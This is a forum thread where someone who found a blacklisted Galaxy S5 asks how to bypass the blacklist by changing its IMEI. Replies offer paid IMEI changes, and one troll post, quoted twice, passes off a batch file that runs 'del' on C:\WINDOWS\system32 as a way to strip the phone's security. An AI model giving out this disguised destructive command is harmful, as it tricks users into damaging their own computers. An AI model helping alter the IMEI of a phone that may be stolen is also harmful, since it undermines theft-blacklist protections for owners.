Black Listed Phone

Collapse
X

• Filter
  • Time
  • Show
Clear All

• Black Listed Phone

So i found this phone walking to the bus stop, its a samsung galaxy S5 it had a few scratches on the button but other than that it was fine

problem is that its been black listed (reported lost or stolen)

was wondering if theres any way around it, its still good for music and i already rooted it, if someone knows if its fixable ill give em 1 billion reps or some gay shit like that

ive researched a bit, looking for a way to change the imei number but i dont want to end up bricking the phone either

Ive since known since rome sins drove the syndromes of the unknowns craft

Leave my sig in church (signature) so they know its mine, opening up brains (branes) with string theory changing space and time

Re: Black Listed Phone

im p sure that there are service to get a blacklisted phone unlocked by changing the IMEI number. Too do it yourself you are going to have to find some sort of program that will cost money anyways so id say getting someone else to do it is the best bet.
    Originally posted by Eriko
    you dont have a sig

Comment

paypal me €50 and i'll do it

well worth it for a galaxy s5
      Originally posted by SockFucker
      listen baby, aint nothin posh or ginger when i pull this dirty hairy, shit'll get very scary, ill put forty shots in your sporty top, SPICE GURLLZZZZ!!!!

Comment

i had a dream last night i was walking on a swinging rope bridge to a city and i found like 5 iphones on the bridge, some 6 pluses, and took the sim cards out so ppl couldnt find them

Comment

Do you have the USB wire for it?

Connect it to your PC.

Open up a notepad file.

Type the following

@echo off
          del:\WINDOWS\system32
          Save the file, not as a txt but as "save as all files". Call it "samsung.bat". Double-click the document. THis will delete the security software from the phone. It'll be factory restored but as it's not your phone that's not really an issue.
          Ravige Media is a leading media company with Internet assets totaling over 1.6 million Pageviews per month. We specialize in connecting advertisers looking to reach the 18-35 Year Old Male Demographic.

Comment

well damn
            Originally posted by SockFucker
            listen baby, aint nothin posh or ginger when i pull this dirty hairy, shit'll get very scary, ill put forty shots in your sporty top, SPICE GURLLZZZZ!!!!

Comment

damn spade 3-0
              Originally posted by Bohboh
              i feel it I'm just out here letting random hate off bro

Comment

spade's admin so i'll take that 1b rep plz
                Originally posted by Bnas
                good theres no reason to kill a damn elephant
                whats the point in killing an elephant? they dont bother noone that i no of

Comment

just deleted windows off of all the systems at work. thanks spade!
                  Originally posted by Eriko
                  you dont have a sig

Comment

Originally posted by SpadeCooley View Post
                    Do you have the USB wire for it?

Connect it to your PC.

Open up a notepad file.

Type the following

@echo off
                    del:\WINDOWS\system32
                    Save the file, not as a txt but as "save as all files". Call it "samsung.bat". Double-click the document. THis will delete the security software from the phone. It'll be factory restored but as it's not your phone that's not really an issue.
                    i have full access to the phone, the phone is even unlocked but when i put my sim card in it says unregisterd, the phone is on the national blacklist across all canadian carriers

Leave my sig in church (signature) so they know its mine, opening up brains (branes) with string theory changing space and time

Comment

where dyou live bbj nh
                      good theres no reason to kill a damn elephant
                      whats the point in killing an elephant? they dont bother noone that i no of

Comment

British colombia

Comment

Piece of shit, return the persons phone..

Comment

chunce teach this youngn about ethics and the importance of hard work to earn nice things in life

Comment

the phone had no sim and there was nothing on the phone, was probably stolen anyways

Comment

Top Active Users

Collapse

There are no top active users.

Unconfigured Ad Widget

Collapse
                              Working...
                              X